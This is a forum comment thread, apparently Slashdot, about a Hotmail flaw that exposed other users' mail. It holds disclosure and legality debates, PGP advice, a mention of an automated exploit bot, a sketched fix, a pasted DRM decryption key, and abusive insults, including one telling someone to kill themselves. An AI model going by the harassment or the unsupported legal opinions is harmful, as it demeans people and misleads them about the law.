You get off your fat lazy asses and use encryption.
Here's my SSN, if anyone's interested:
-----BEGIN PGP MESSAGE-----qANQR1DBwU4DlqED0wdUwQkQCADXxCLpw7M5WBka374Xt7Vfh
O671tUTFvUVD534Na2sq6macNcOVw51WJmxPwFsYrvUriFEAH
pLTMzkW3L5nXLn2ZfyUZl2sjzV4wayjbomDPklSOOVB6Vhlqp
qy2GHDt+7qUfIzxhNJzCGxiEtzzVJ7ZwyGSK1pk6inF17ty1q
gw2clFq6ukexmtIMfkkoxMoRJhds30AOELnU0VnFsm1uowysC
g+Vwh3p7ytU5RKm2uifMGT9ZozxM00sgpWdzneGc7fKhCQGPB
hdsvzPXKWPA/KkjSHnhDiR4xroUvX7E9LA6gRpPNnsUSjFgez
kwdqB46LfnVr9TxWen4hKYsaH0nBHV0yROL8pbpOiR2FlCC5N
uVwAXfjnm71aUUuVFlTCVW3zqAOApK3fLO1ONt14WzdSjrUKU
mgjCj5v6zSFUqbpLsPf7Ix6duEbjYKVJFEgkKm4tCK9ID+H9G
9iXrAZeFNTb9hcHgMzBq97uDK3tutKQI73wSLGW/gICbztpS2
g5VDJ6ElySVnlNQ2lpIPSaMLE9bAgcxC1w60LphwlTlrQF2DY
=iDVa
-----END PGP MESSAGE-----
Admiral Yamamoto
... or two.
1. The person cracking/social-engineering into your e-mail account will more than likely be somebody who you already know. So don't use widely-known personal info as a password reminder!
2. If you cheat on your S.O., you WILL get caught. This is especially true if you're a man or a lesbian - women seem to be natural Sherlock Holmeses. And yes, "e-lovers" count as cheating.
Freedom: "I won't!"
Okay. If this isn't a hoax, then why hasn't anyone posted the contents of billgates@hotmail.com yet?
--Blair
But when you start to consider that the super-duper-top-secret algorithm for encoding message numbers constitutes "encryption" according to some, then it's protected under the DMCA.
You have just published a "Circumvention Algorithm."
Shame on you. No doubt the FBI is on their way to your house to slap you on the wrists with wet noodles. Oops, I mean slap you in irons. The wet noodles are for Microsoft under the new Punitive Actions for the antitrust suit.
The living have better things to do than to continue hating the dead.
you can download the hobo4 program, written by the folks at Root Core to automate this vulnerability here. Warning about the code however:
a) it's in VB
b) you'll see methods like this:
Public Sub ii(MSG As String)
l_info.Caption = ">" & MSG
End Sub
are there no coding standards even among hacks?
"My mother never saw the irony in calling me a son-of-a-bitch." - Jack Nicholson
Does everyone realize that my email is not valuable to anybody but me? I don't email people my credit card numbers!
Plus, any lowlife can get a job washing dishes where he has access to a trashcan full of old receipts with my number on it anyways.
there are 2 kinds of people. those who divide people into 2 kinds, and those who don't.
That's okay.
Microsoft's hotmail operation is in flagrant violation of the opt-out provisions of existing privacy laws.
Microsoft sends email to users' inboxes by going around the entire email system, circumventing all attempts to opt out, block, or filter the spam. These emails come from "staff@hotmail.com" and are clearly not normal messages, because they have to power to disable the Reply buttons.
When told they are breaking the law, Microsoft sends back boilerplate that alternately denies the spam is from Microsoft or gives the instructions for the aforementioned nonworking methods of blocking spam.
--Blair
P.S. As it turns out, their monthly spam-o-gram came very shortly after I opened my first--and only--hotmail account, so just about all of the correspondence that has ever transited that account has been my complaints, their responses, and more spam from them. I think the balance is one or two non-microsoft spams and one email from a guy who runs an anti-spam website to whom I'd mailed the long transcript of nonsense that had occurred.
Hotmail's been bare and open to intrusion since it first opened, before SSL secured pages protected the password exchange, and before Microsoft bought them (remember HoTMaiL). When SSL did come about, only the password exchange was secured, the remainder of the session was left as cleartext HTTP. That's how it is today. It's not hard, as others have pointed out, to sniff out anyone's hotmail. Hotmail I believe in their service agreement states that the mail cannot be guaranteed to be private, and you have to accept that if you want to use the service.
So, if you want secured e-mail, do what you'd do on any other mail service, be it web, POP3, IMAP or whatever...PGP the message, and e-mail the PGP cyphertext. Otherwise, they are all just cleartext.
(I was there at the beginning, HoTMaiL's launch on July 4th, 1996.)
USNG: 14TPU4605
You get a gun (legal where most hotmail servers are located, I believe). You load it with ammo. You point it at somebody's head, and you pull the trigger!
Sue me!
I hope the similarity is obvious...
May we live long and die out
How about Loompanics? They publish guides on such topics as murder and, guess what? They're legal. I recall a court case where somebody sued them because some other person used their guide to commit murder. I think that ended with a ruling that Loompanics was protected.
Now, if writing a guide on how to kill some random person is legal, what would a judge say about a guide to cracking hotmail and reading their email?
Reboot macht Frei.
Actually, they've already figured out that you can use google's translate function to post a goatse.cx link that shows up as [google.com].
In what twisted universe is "This is almost certainly illegal, idiots." (to paraphrase) construed as legal advice?
If a tree falls on an anonymous coward yelling 'first post' in the forest, does anybody hear?
tell that to 2600... despite the moral issue... i would think if this got out enough ms might sue... and right or wrong they've got the money to do alot of damage
I believe sex is highly over rated... unless it involves me
> and a smart lawyer could argue that the promotion of this item constitues the marketing and or distribution of this illegal material thus making slashdot and its owners accesories after the fact to a crime (yes hacking is a criminal offence with jail terms)
:)
:)
That's playing with words, a smart lawyer could argue.. since you're arguing you consider youself smart?
Okay, go sue everyone that has moderation rights here, even those who have it tagged on and don't even know exactly what it is because they barely started reading slashdot, and while at it, sue the school/isp/company on which the computer used to commit such a moderation was hooked, and since we're in the complete nonsence and you obviously don't get what moderation is for, why not sue the company that made the keyboard and mouse with which the CRIMINAL act was commited.
Oh shit, wait! you're probably about to sue microsoft...
>YES I AM A LAWYER
Yeah, and your caps lock is on too.
----
Disclaimer
These comments aren't my own, I was playing quake and got owned.
--- Metamoderating abusive downgraders since my 300th post.
Now I have something to do tonight.. heh
though, seriously... mm, that's not good. On a side note, I wonder how many of us have accounts at places such as hushmail.com ?
Insert mind here.
http://dailynews.yahoo.com/h/zd/20010813/tc/court_ posters_ids_can_stay_under_wraps_1.html
It would seem that anonymous really is anonymous
"The difference between genius and stupidity is that genius has its limits."- -- Albert Einstein
Dude, you're getting a FREE email account hosted on their servers. I cannot believe you are bitching about a MONTHLY email that they send you. There are tons of other free email services out there. Why don't you use one of those and quit wasting your time tilting at windmills. Or are you just looking for some easy Microsoft bashing mod points?
Hotmail sucks (more) since the redesign anyway.
The sole purpose of the Internet is to get porn and bomb making plans into the hands of children.
Fuck you for linking to something so fucking disgusting. You are a piece of shit.
Does anyone else think that "crackers can read your email" is something Chef from South Park would say?
CHEF: Now, children, don't leave your computer on when you're not around! Crazy crackers can read your email!
STAN: Holy crap!
CARTMAN: You guys are so lame.
- A.P.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
My thoughts exactly! Except you worded it a hell of a lot better than I could
My god that's totally hilarious. someone please mod this guy up :)
EOM
Hotmail's actions are negligent and show a callous disregard for the privacy and security of their user's data. This particular security hole is not even an acciedental mistake, it is plain incompetence. That kind of incompetence must be exposed and Hotmail and its officers should be held liable under civil and possibly criminal statutes.
Under your kind of reasoning, institutions like Consumer Union would not be able to point out security defects in commonly marketed devices or services. This is simply not acceptable, and if your statements represent current legal theory, the law needs to change. Consumers need this kind of information.
Perhaps your middle school doesn't have email accounts and you have to use Hotmail, but the mere fact that you have a Hotmail account- which, apparently, you use at least for unimportant stuff- means Microsoft has one more user to brag about to advertisers. Obviously it isn't such a big piece of shit, or you'd use Yahoo! or some other free webmail service.
If you're really concerned about Microsoft's lack of security and quality control, don't buy their software or use their services. And it's the problem of millions of users like you who use Hotmail, many of whom either don't have much of a choice for email accounts or were using it before MS took over. Lastly, exploiting the flaw won't make them fix it any faster than they are right now. It'll just get criminal charges pressed against a few script kiddies, and rightly so.
Personally, I think anything beyond Pine is overkill. Not everyone is lucky enough to have email accounts on Unix servers, though. Passport sounds like an absurdly awful idea, but I don't think anyone could do it right. I'm worried about Microsoft taking over the Internet, but I don't think they'd necessarily do a worse job on Passport than, say, Sun. There's not a lot of practical work done so far involving such massive systems, and I don't think they've thought it through very clearly beyond the marketing department.
Which brings up the obvious question: where's the +3, informative moderation?
Microsoft sends email to users' inboxes by going around the entire email system, circumventing all attempts to opt out, block, or filter the spam. These emails come from "staff@hotmail.com" and are clearly not normal messages, because they have to power to disable the Reply buttons.
Your hate is clearly blinding you. I have been a hotmail customer for about three years and I have received about 5 or 6 messages in this time from staff@hotmail.com, and they have always been about feature changes or other information that actually is relevant to the service. IMO this is a very low price to pay for a free service and it is EXTREMELY low compared to most of the other free services that usually spam you couple of times a week with totally non-relevant messages.
When men used to be men
Its already all over the web. I read it at The Register hours ago.
Just like DeCSS! XXXL I'm sure, but we're talking coders here, so it should fit well.
Please check the user's id next time you fetch a message. Thanks!
Also, with Yahoo mail you can use any real (non-web based) email client to download your mail so you don't have to use their interface, then when you go on vaction you turn your automatic email collection off and you can access your email from any device which allows you to surf the web. Just go to the options page and find out your incoming and outgoing SMTP and their POP stuff.
-A
Say, does anyone want to hack into this guy's email?
Greetings, all -
...)
What's the latest on the migration from FreeBSD to W2000? Is that totally complete?
If not, were any BSD boxes compromised?
(No mention of that on 'securityfocus.com', either
Steve
Good point on that - but the laws on computer crime are different arent they ?
Still you might be right - but would this not depend on the jurisdiction ? - if the case was in the New York Courts but Slashdot is based in say California it might not neccesarily be precedent setting as its not a federal case ? I dont know as i am not a lawyer but it would be interesting to know as this is a valid question
I refuse to argue with Anonymous Cowards - if you want a discussion get an account....
This isn't a new hole. It has been known for over a year and nobody has done anything to fix it. Maybe Microsoft will actually be responsible enough to fix it this time. Anyway, you can also view deleted emails using this technique as well.
Actually i have had hotmail accounts for years and have also had accounts on other providers of free mail services.
Yahoo was spam city - it may not be hackable but christ did i get spammed - and emails from yahoo 'affiliates' were a constant problem - even though i asked them not too
RocketMail - not bad - but now gone
Altavista - More porn spam than you can poke a stick at and mesaages from them every day
Thats a fee examples
Hotmail used to be bad - but over the last 8 months with the account i have i average 1 spam a week (those dammned college degree ones) and 1 message a month from hotmal staff - i get little other spam and the filters work - its also fress so who cares about 1 little message - and the address is a non reply - i have them here on my system for helpdesk and notification purposes - its not 'power' it's a standard thing.
Do you use hotmail daily these days ? (just wondering not flamebaiting)
I refuse to argue with Anonymous Cowards - if you want a discussion get an account....
They stuck me in an institution, said it was the only solution, to...protect me from the enemy, myself
get caught - then you will see how criminal it might be
Don't worry, I've just read your mail and it's not that interesting.
Im not offering legal advice - just posing a possible alert - i have not acted or paraphrased this as legal advice and for it to be held up as legal advice in a court of law i would need to state my name, law firm and where i am registered to the bar as a minimum.
/. because i have a hobby of tech. i was making a point (and i do criminal law for a living) to try and help out and maybe avoid a possible action.
remove head from arse my friend - i was trying to maker a valid comment that might help out here - i read
So i'm not willing to list my name and give you an email address to flame me on cause i might nor agree and also to risk my Career.
OK heres a dislcaimer.
ANYTHING YOU READ IN A PUBLIC FORUM DOES NOT AND CANNOT CONSTITUTE PROPER LEGAL ADVICE - YOU SHOUDL ALWAYS SEEK AN OPINION FROM A LAWYER YOU CAN TRUST - THIS IS AN OPINION ONLY AND COMES UNSOLICITED AND THUS IS NOT A LEGAL STATEMENT.
Happy ??
Now next time please refute my post instead of attacking my possible credentials ? i dont need to post a transcript anymore than i need to ask you what you do for a living.
Oh and the IP would not really help you - where would you trace it to - the ISP who provides my services ? i dunno as i havent posted under MY NAME and the firm i work for has a proxy with a fixed IP and internal IP is not logged(i could be anyone of 1500 staff here) what would you do - i am as entitled to post an opinion here as you are - and thats what i posted an opinion.
"whilst Slashdot don't censor their posters (free speech is something i'm all for) allowing this to be moderated up shows the sort of people that this site is being controlled by "
Um, moderators do not control slashdot. Moderators are volunteers, and as such, they do not own slashdot. IANAL.
-Shaunak.
Why is it that none of you Nazi fucks can spell?
Carpe Deez
You have the right to say absulutely anything
you so desire to say. It is guarenteed in the
constitution:
[Whips out TI-86 to get ab ebook]
Ok, this kills the DMCA and your argument:
From the constitution of the United States of America:
"Amendment I
Congress shall make no law respecting an establishment of religion, or prohibiting the free excercize thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the government for a redress of grievances."
If you have any problem understanding the above quote, grab a dictionary, and look up the words (abridging).
~SirNonya!
because I submited this story [ The Register version ] a few hours before this guy and it was rejected... go figure!
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
Get that "I READ YOUR EMAIL" tshirt out of the closet again.
But more seriosly, these guys came up with nothng really new. Basically it presents a challange for an ASP (that is what they are running, mod me down if I am wrong) system to work with full NT accounts. It in much easier to create a single log in to the DB backend and then just spit out an rs of all the things tied to a user id. So essentially to make this secure, the display page (one that displays the complete text) would have to confirm user id every time the page is pulled, istead of just pulling the one with the given guid. That is damn simple to do, but it actually requires more work, and almost all companies would not bother. So check all those email services that use single account with users stored in db, and you will find plenty.
IMHO it is a 5 min bugfix:
If hash(rs!User) != request("user") then 303 Forbidden
Instead of just pulling the email.
Disclaimer: The above is NOT pure ASP even though it is similar. I also do not remember if 303 is forbidden.
badness 10000
Some of the most beautiful hacks have come from some of the ugliest code.
That one does not fall into this catagory though.
For a good time call www.sawkie.com
Lawyer or no, you should understand that consumers' rights supercede a business' rights, and when a problem like this is ignored for "3 days" I hope the exploit is on the evening news until it's fixed. The only possible defense I can see for hotmail is to say that they provide a free service; but they provide a service where people pay with their personal information, which is sold to advertisers. Given that you are a lawyer, you should be looking to change things like this for the better instead of demonizing the spread of information. I might've been able to sympathize if you had at least insulted the people in other posts who actually claimed to be doing the cracking.
Slashdot also allows it to be moderated down.
But it hasn't been. Meanwhile, you have also
been moderated up. How contradictory!
What do you make of this?
Lawyers can't see the forest for the trees.
It's no wonder people hate them.
Major Security Hole (Slashdot World):
Just making sure I get this right
first hotmail is hacked...
next, hotmail's slashdotted..
AHA! that's it! veee mussst stop access to all, and zat should stop anyone hackin eeet!!
my blog
That reminds me....
What do you call 100,000 lawyers at the bottom of the ocean?
Every time they want to test a security update they try it on hotmail first to see if it works :)
Oops. Looks like hotmail'ss been cracked. Better not release our 700000th security update.
as i recall... hotmail wasnt created by micrsoft
All you can do is read other people's spam.
Help save the critically endangered Blue Iguana
It now asks for validation of your password before it takes you to the message..
:P
After you type it in, it still takes you to the same error message as before though, so it may not be a real fix..
It does make the bot released by root-core pretty worthless though
All the more reason to use PGP. Doesn't get much easier than that...but still nobody uses it. How frustrating.
Later,
Goss
This is a discussion of a security problem. The primary topic I see in the messages is "how serious is this bug anyway", and in order to make a determination of that the participants need to discuss how easily the bug can be exploited. This topic is an integral part of the discussion of the bug, and is essential whether the discussion is intended to be strictly academic or in order to actually cause hacking.
I, for one, found this discussion to be technically informative, in that it helps me to understand the current level of Microsoft's security thinking, which helps me (as a technical professional) to form an opinion regarding how worried I should be about using Microsoft products in my work.
So, what this comes down to is that you're claiming that it's illegal to disseminate this information, but at the same time there is no other way to discuss the subject for legitimate purposes. Federal law versus First Amendment. Which one do you think wins?
It's people like you, who think you can legislate away the right to talk about things, to take away first amendment rights, who are the problem. Keep it up and pretty soon there will be no computer security because nobody will be able to talk about it.
Hmmm, I've got three yahoo accounts and the only one that catches spam is the spamcatcher one (and never from yahoo themselves, tho YMMV on that one) Maybe 'q-soe' is a little too easy for the dictionary attacks.
I post this without comment - some notes i have here on some components of the first amendment
3. The freedom of speech:
a. The absolute freedom of engaging in or refraining from speech and non-verbal communication, and receiving or refusing to receive information, without any coercion, shall be a rebuttable presumption in any administrative or judicial proceeding, concerning any attempts to abridge them. The onus of rebutting this presumption shall rest entirely on the party seeking such abridgment, by showing that the speech or non-verbal communication sought to be restrained, or the information to be withheld, do not, by virtue of some other conflicting and overriding considerations or necessities, fall within the categories of freedoms that this section is intended to protect;
b. Any Congressional, State, or local legislation or regulation by any governmental authority, which is so imprecise, ambiguous, vague, overbroad, or excessively general in its terms that it provides a pretext for arbitrary or discriminatory law enforcement, uncertainty in the minds of persons of common intelligence as to the limits of protected communication, and creating a chilling effect on the unrestrained exercise of freedoms clearly not proscribed, shall be wholly void on its face; except that insubstantial defects may enable the courts to merely sever unenforceable parts or specific applications thereof;
c. Prior restraint shall not be imposed on any communication by institutionalized or informal censorship or coercion, however subtle, unless, in each instance such restraint is sought, a fair judicial hearing, following proper notice, is held; except where the required delay may cause irreparable harm, upon which a temporary restraining order, subject to a prompt subsequent hearing, may be issued;
d. Maintaining the integrity of the judicial process may validly require in-court and out-of-court curtailments on communication and information to prevent the clear and present probability of serious interference therewith;
e. The free and uninhibited conduct of any electoral process shall not be interfered with, unless the integrity of the process itself is, or appears to be, threatened, or where its integrity is protected or enhanced thereby;
f. In order to maintain the reliability and preparedness of the armed services, restrictions on communications and information likely to reduce the effectiveness of response to command may be justified therein;
g. Inmates of penal institutions and preconviction holding facilities shall retain the freedoms granted herein to the extent that their exercise does not endanger prison security and order, and any limitation imposed, however warranted, shall be in accordance with properly defined and administered procedural safeguards;
h. Public employees or licensees may be required to take such oaths or affirmations as are necessary to obtain their commitment to the lawful performance of their functions, or to make disclosures about themselves, as a condition of their office or employment, that are crucially relevant, lawful, and not repugnant to the letter and spirit of this Constitution;
i. Fighting words that tend to incite immediate violence, offensive speech to a hostile, potentially violent audience, false statements likely to cause panic, disorder and safety hazards, advocacy aimed at inciting or producing imminent lawless action and is likely to succeed shall not be protected under this section;
j. Untrue defamatory speech (slander) or other communication (libel) is not protected herein; but the baseless defamation of public officials respecting their official conduct and of public figures respecting matters related to the causes or circumstances of their fame or notoriety, or a public controversy in which they willingly participate, shall, in the absence of malice (requiring communication knowingly false or recklessly disregardful of its truth or falsity), be protected;
k. Sexual conduct described or depicted in a patently offensive manner, lacking serious literary, artistic, political or scientific value, and the dominant theme of which would appeal to the abnormal, prurient sexual interest of the average normal adult person, as determined by the application of contemporary standards of a given relevant geographically circumscribed community, shall be assumed to be harmful to society, and be outweighed by the need to protect the social interest in preserving, or not blatantly offending, recognized, generally approved norms of morality; and in the application of this clause, the corruption of minors, by exposure to obscenity, or their use in its description or depiction, shall be an aggravating factor supporting the denial of the freedoms herein granted. But the foregoing notwithstanding, no law proscribing pornography in any form, except child pornography, shall be made, that invades the personal right of privacy exercised in non-public places;
l. Public property open to the public shall be available for the exercise of freedoms herein granted, subject to reasonable, non- discriminatory, content-neutral regulations serving some significant government interest not otherwise attainable, concerning the orderliness, public safety and convenience, and personal right of privacy aspects. of any such exercise, by determining, on the basis of unambiguous, non-discretionary guidelines and procedural safeguards, the time, place and acceptable manner thereof. Private property open to the public, depending on the extent and exclusivity of its use, and its relevance in the public life of a community, may, subject to judicial determination, be required to partially accommodate the exercise of freedom of communication and information, or even be considered the equivalent of public property open to the public. But in either case, where a total ban on expression is lawfully applied in any public place, or by any medium, assurance of a satisfactory alternative place or medium shall be provided to ensure that such a ban does not result in suppression of the exercise of anyone's right of expression, or a community's right to receive information intended to be conveyed; and in any limitation of or ban on the exercise of such freedoms, the burden of showing just cause will rest entirely on the party seeking to impose it; and
m. Commercial communication primarily concerned with promoting commercial transactions may, in order to serve a substantial government interest, be subjected to reasonable limitations on the grounds of confusing or deceiving the public, or to banning, if false, misleading or otherwise illegal, and the communicator may be required to carry the burden of showing cause why protection under this section should not be withheld.
4. The freedom of the press:
a. All freedoms and limitations thereof described in the previous section shall apply to all media of information as well;
b. The laws of defamation, especially those applying to private individuals, shall be construed and applied against information media defendants in such a way, that their special responsibility for fairness and the avoidance of malice, negligence, and damaging reporting due to incompetence, be given due weight;
c. The communication of obscenity through the information media may be subject to special sanctions and restraints where it involves the invasion of privacy, or ready access to minors; but distributors, sellers and other facilitators of the conveyance of information media products in any form shall not be discouraged or chilled in their freedom to contribute to the maintenance of a free market of information and ideas by burdening them with an absolute presumption of knowledge of the contents of all information that they carry;
d. The preservation of a fair criminal trial by a ban on media reporting shall require virtual certainty that such a ban is essential and would in fact safeguard the rights of the accused, and that there is no viable alternative way of affording such protection; but the right of privacy of jurors concerning non-relevant facts and circumstances may be afforded reasonable restraints on reporting; and there shall be no automatic or non-consensual right to interview the accused or a convicted prisoner in a penal institution as long as some alternative channel of requesting information from an incarcerated person remains open through which the prisoner may choose to respond;
e. News-gatherers shall not be granted any privileges or immunities, or greater protection than any other person under the freedom of communications and information provisions herein, however, their need for continuous reliance on news sources requires special consideration on the part of public officials, in order not to disrupt the availability of such sources, or to harass or inhibit their activities in any unlawful or unreasonable manner;
f. In grand jury proceedings news reporters shall be required to give evidence and reveal the sources thereof in the manner any other witness may be compelled to do, and their offices may be searched in accordance with the requirements of the Fourth Amendment herein, however, in authorizing and carrying out each such search, special care must be taken to preserve the confidentiality of information concerning, persons and matters not targeted thereby;
g. Information media conveying its information on publicly-owned property subject to physical limitations, such as the airwaves, shall be subject to governmental licensing and regulation on a fair and equitable basis, solely in the public interest. Any governmental, political or economic interest not in harmony therewith shall have access to judicial review;
h. The acceptance of political or election campaign advertising in any medium of information shall not be compelled, but editorializing on political and other controversial public issues shall be subject to regulation prescribing fairness and balance in news media otherwise subject to licensing and regulation;
i. Government regulation aimed at preventing the monopoly of available public sources of information in a given geographic area may properly be applied to any medium or combination of media of information;
j. In the absence of a compelling State interest, any tax extractable exclusively from any one medium, or all media of information, shall be presumed to be a covert attempt to censor or penalize the press, and to interfere with the public's right of access to independently and freely provided information.
5. The freedom of association:
a. As a general rule, the freedom to associate or refuse to associate, without coercion, and to petition, individually or associated with one's peers, the government of the United States or any State or local government, for a redress of grievances, shall not be abridged; and the freedoms and lawful curtailments thereof described in section 3 of this article shall apply to associations of various forms as well;
b. Membership in, or collaboration with, associations the aims or activities of which are unprotected by this Constitution, shall not be considered prima facie evidence of identification with such aims or participation in such activities;
c. Membership in or collaboration with associations engaging in illegal advocacy or activity may carry the presumption of sharing in the association's culpability where a member or collaborator possesses specific knowledge of such advocacy or activity and a clear intent that the aims be reached or the activities be carried out;
d. Associations engaged in unlawful advocacy or activity may be compelled to disclose the names of their members if such disclosure is essential to serve a substantial governmental interest; and individuals may be required to disclose any such membership as a relevant and essential condition of their public office or employment or membership in validly licensed professional bodies;
e. Absent a compelling governmental interest, political parties shall have absolute freedom from interference in their internal affairs;
f. In order to promote harmonious labor relations, simple majorities of employees may designate or form a union as a sole bargaining agent, and compel non-members to pay dues, and abide by agreements reached on their behalf. However, their dues shall be used solely for collective bargaining activities, and their right to communicate independently with their employers shall not be denied;
g. Non-coercive, peaceful picketing or boycotting intended to publicize economic or labor disputes, or the alleged denial of rights guaranteed by this Constitution, shall be protected;
h. Inmates of penal institutions may be denied their right of association, including the formation of or participation in any prison unions;
i. Political activity or party affiliation of public employees, unless specifically in conflict with the effective performance of their functions, shall not be regarded as a disqualification for public employment; and
j. Demonstrations and meetings in public places shall be conducted within the framework of subsection 1 of section 3 of this article.
Dear mrs. Hacker,
If you are able to enter my hotmail-inbox, would you be please so kind to delete those 300 spam messages after you've read them?
Thank you so kind
Arleo
If you want my hotmail password that bad, just ask. I'll send it to you and save you the trouble.
Donate background CPU time to fight cancer.
"No I'm not kidding. You can't make that stuff up."
;)
Um, yes you can. "hey mr comdrtaco my techer is L4M3!!!!!1 can u hack his emali acount so i can red teh test ansers???????"
Boo-yaa! Fooled you, I just made that up.
It's about time they told us something we DON'T know about Hotmail, eh?
Insert mind here.
YES I AM A LAWYER
If you are, you're a very bad one.
Just read this l33t article on "How To Become a Hacker", and you'll be hacking into people's mail before you know it!
"Oppression and harassment is a small price to pay to live in the land of the free." -- Montgomery Burns.
Experts? Experts who think you need real-world authentication to log into hotmail?
I'll just leave my door unlocked because it's not a problem unless I'm specifically targeted.
Anyway, if you're going to write a web page that cites other web pages, please put in a link. The anonymous authors of this page ("Tech Live staff") neglected
to link to Root-Core, which seems to be the focus of the story, although they linked to Sophos, which was tangential.
And this was on Bugtraq on Saturday.
Are there any good free e-mail services out there im sick of using hotmail and even more now that they that IMHO ugly win XP look.
Not disagreeing with you, but that post seemed to be a paste from a message on Bugtraq on Saturday. Bugtraq always has full disclosure exploits. Why hasn't this legal theory been applied to Bugtraq yet, as they are quite high profile?
because I think everyone has the right to know how to enlarge their penis by as much as 25%! Sorry but i had to put this link in here from one of my confidential hotmail mails. That electrical thing looks very dangerous.
King Arthur: Are all men from the future loud-mouthed braggarts? Ash: Nope. Just me baby... Just me.
So what MS product got hacked again?
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Is english your first language ?
The software isnt running on a windows system as it has not been transitioned from free BSD fully yet - the exploit is nothing that you may not find in other systems non MS - i havent looked
Im not going to comment on the peice of shit post - thats a matter for opinion
If you use that argument for an excuse to hack a commercial system then when and if you get arrested you will get a very scary shock.
'I only broke into that persons house cause the brand of lock they use is faulty and i thought that stealing their TV would show them they needed to fix it'
Many many people use hotmail for many things - they have a reasonable expectation of security and dont need morons like you breaking into it for the hell of it
2 exploits in lets see how many years has it been up, about 8 so 2 exploits in 8 years means it has been hacked less often than the FBI, CIA, Yahoo, etc etc - hardly a seriously unsafe system.
You sir are the dumb ass - and i suspect you are 12 years old and writing this on a win98 box at school
When it has *not* been hacked!
StarTux
To borrow from you analogy, the real risk is not so much the lunatic that throws a match into the leaking gasoline as some innocent bystander that light up a cigarette.
Please send me your bank account numbers and paypal login/password so that I can make sure they are authentic.
-matt@hotmail.com
-nd
I wish the Slashdot articles showed the year in the date. I can't tell if this is a new article, or if it is a repost from last year.
Now someone's going to get into my hotmail spam account and be able to read all my spam. What to do?
I mean, really, does anyone use hotmail for anything other than a spam repository?
Somebody tell me what I've got to do to get mod points, this post makes it all worth while!!!
--AC
No, I think if people can get away with setting up a website to organize the murders of Abortion Doctors than posting how to hack into hotmail might be legal too... But then again Kevin Mitnick went to jail longer than most rapists....
Sometimes I wonder if I'm in the right crime business.
And No, You are not a Lawyer. (I read your hotmail.)
~Anonymous Coward
hackers and the geek community (for lack of a better phrase) hate MS, which means they target MS for hacking, which means that, eventually, they will find holes.
I hate MS as much as anyone else that's reading this thread, but if there was a community of MS zealots and hackers that hated open-source products, and took it upon themselves to hack Slashdot, redhat.com, sourceforge, and all the other major OSS-scene sites, there would be quite a few security holes found there, too.
Glass houses, people..
- JW
Just give up. Seriously. You tried you failed repeatedly you continue to suck. You are the IUD of the internet. Utterly incabable of taking care of yourself and completely unloved. Just kill yourself and go away.
I'm all for a security hole in Hotmail if I can get the crackers to somehow delete the 100 pieces of spam I get to that account everyday.
--It's Pimptastic!--
Ha ha. Funny. I see are making a comment about the dullness of my reply to the article. Know what? I don't care if I interest you...after all you are an anonymous coward.
-Aqua Seafoam- "In the academy we sat, learned like fools, we read predictability as if were wisdom" - CRASS -
wow - you read my hotmail - an account i dont even have ? - shit are there some good ones there
Loser
Bill: "I'll take internet for 400"
Host: "what do you know, the daily double. Ahem. Here it is; it's encrypted (with end-to-end encryption between HushMail users -- email sent to non-Hush accounts are only sent to Hush's servers unencryped), it's more secure. I'm not a Hush representative, but after using it for a few
months, it's definitely the answer."
*bing*
Susie: "What is the best free email service?"
Host: "Yes! 800 points go to Susie, and that's all for tonight."
REAL friends don't let freinds use Microsoft
LOL - You really make me laugh.. try sueing me if I were to post the info on hacking into a personal computer.. What could you do? Sue.. sure.. would you win? Not a chance in hell! You might in your country, but I'm not there am I.. and making the authorities come get me here would be quite the joke ;o)
Yeah too bad stuff like this is a whole lot more entertaining.
Command:
Bah this is the place you want to be.
So, do you tell them? Sounds like you could make a couple bucks out of this..
Procrastinators, Unite Tomorrow!!
Perhaps SSL would help by making it a secure system?
... but moving to a secure (SSL) site would be a major investment, even by MS's standards and with .NET coming they would hardly think it worth while.
Perhaps encrypting all traffic between client and server would make it a wee bit more secure?
This would also give some 'state' (if handled properly) to the hotmail session, and not allow you to jump to someone else's mailbox/email.
----- One piece short of Legoland
your fucking hilarious
shuddup sissy
My cat's breath smells like cat food.--R. Wiggums
Dude, you're allowed to walk down the street for free, I can't believe you'd bitch about the cops pushing flyers in your pockets and searching you for doobs on every corner.
The account isn't free. It's got banner ads all over it. That's my eyeball time purchased by Microsoft's sponsors. And they count the page hits for their own advertising. That's the price paid for my account. I also to spend my valuable time observing, and in some cases stopping GIF animations and Flash4 loops on, those ads. But I have the legal right to stop them from mixing their spam with my email.
Microsoft is breaking the law. They offered a box to check to opt out of spam from all sources, and I checked it. They know the law. They choose to flout it, going so far as to design software to get around all attempts to block their spam, and to train customer-support personnel in evading the issue and delaying its resolution. My indignation is completely justified.
It's not any less a crime just because some people think it's okay to be victimized. I expect people to disagree with that. I expect people to vote against it. I expect some people still to elect fascists and communists into power in their countries. No issue is 100%.
Microsoft is committing this crime against millions of us, when all they have to do is pay attention to that checkbox and they won't be committing that crime against any of us. What's so hard about that?
--Blair
That time Randal Schwartz's account was hacked remains one of the funniest things I've ever read. That post, and the others, were works of art.